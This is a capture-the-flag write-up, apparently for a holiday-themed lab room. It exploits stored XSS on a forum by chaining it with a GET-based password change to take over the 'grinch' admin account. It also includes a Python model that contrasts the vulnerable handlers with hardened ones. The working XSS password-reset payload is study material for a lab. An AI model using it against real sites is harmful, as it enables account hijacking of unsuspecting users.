# \[Day 5] Pesky Elf Forum

## Story

The Elf Forum is where all the elves express their joy and excitement about Christmas, but Grinch Enterprises has one bad admin account, and they've installed a plugin that changes all mentions of Christmas to Buttmas!! McSkidy needs to find that admin account and disable the plugin.

## Challenge

![](/files/DAvzIOqQUjHt0OwThaiD)

Logging in with the given credentials returns the following.

```
Username: McSkidy

Password: password
```

![](/files/yuoTGa79GshT9n2eQ330)

Visiting the settings page reveals a password reset feature.

![](/files/lwbFapPLCrCCVrFDdgLF)

Posting the following as a comment reveals that the platform is vulnerable to stored XSS: any payload posted as a comment runs in the browser of every other user who views the page.

```
<script>alert(1)</script>
```

![](/files/WLl03woy4T4e7qKNoFu6)

![](/files/SxgRZarpNcktUCb4JGl1)

Now I needed to chain this stored XSS with a password reset attack against the `grinch` account, which should get me in. The password reset request is revealed when trying to change the password:

```
http://10.10.31.34/settings?new_password=nee
```

![](/files/nuu869FnBxK5bs19pkCa)

Next, I posted a comment with the following contents to change the password of any visitor to that thread to `neewashere`:

```
<script>fetch('/settings?new_password=neewashere');</script>
```

![](/files/x9NAUGcHnVyj694D6Y58)

After waiting for about a minute or so, I was able to log in to the `grinch` account with `neewashere` as the password. I was also able to see the active plugin and disable it.
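The chain works because of two server-side defects: comment bodies are rendered without output encoding, and the password change is a state-changing GET with no CSRF token and no re-authentication. The following added example (not the forum's code) models both defects beside their hardened versions and replays the writeup's chain against each; the `Session` class, handler names and account values are hypothetical.

```python
import hmac
import html
import secrets
from dataclasses import dataclass, field

# Constructed sample accounts, not the room's real data.
USERS = {"grinch": "original-secret", "McSkidy": "password"}

@dataclass
class Session:
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))

# --- As exploited in the writeup: raw comment body, GET-triggered password change ---
def render_comment_vulnerable(body: str) -> str:
    # Body is interpolated verbatim, so a <script> tag executes for every viewer.
    return f"<div class='comment'>{body}</div>"

def change_password_vulnerable(session: Session, method: str, params: dict) -> int:
    # Any request carrying the victim's cookie works, including a GET fired by fetch().
    USERS[session.user] = params["new_password"]
    return 200

# --- Hardened: output encoding + POST-only, CSRF-token-bound, re-authenticated change ---
def render_comment(body: str) -> str:
    return f"<div class='comment'>{html.escape(body, quote=True)}</div>"

def change_password(session: Session, method: str, params: dict) -> int:
    if method != "POST":
        return 405  # a state change must not be reachable via GET
    if not hmac.compare_digest(params.get("csrf_token", ""), session.csrf_token):
        return 403  # a forged request from injected script lacks the per-session token
    if params.get("current_password") != USERS[session.user]:
        return 401  # script-driven requests do not know the current password
    USERS[session.user] = params["new_password"]
    return 200

def replay_chain(hardened: bool) -> int:
    """Replays the room's chain: the grinch's browser renders the thread, the stored
    payload runs, and fetch() sends GET /settings?new_password=... with his cookie.
    Returns the handler's status code, or 0 if the payload never executed."""
    USERS["grinch"] = "original-secret"
    victim = Session("grinch")
    payload = "<script>fetch('/settings?new_password=neewashere');</script>"
    page = (render_comment if hardened else render_comment_vulnerable)(payload)
    if "<script>" not in page:
        return 0  # encoded as text: no script runs, so no request is made
    handler = change_password if hardened else change_password_vulnerable
    return handler(victim, "GET", {"new_password": "neewashere"})
```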

![](/files/F81HR7hAF8mpSLa2UOA0)

![](/files/oJj3alyLmWzs4IRIUnyR)

![](/files/6Mrfz755YvFcB3UBXzG5)

{% hint style="success" %}
What flag did you get when you disabled the plugin?

* THM{NO\_MO\*\***\_**\*\*\*\*\*}
{% endhint %}
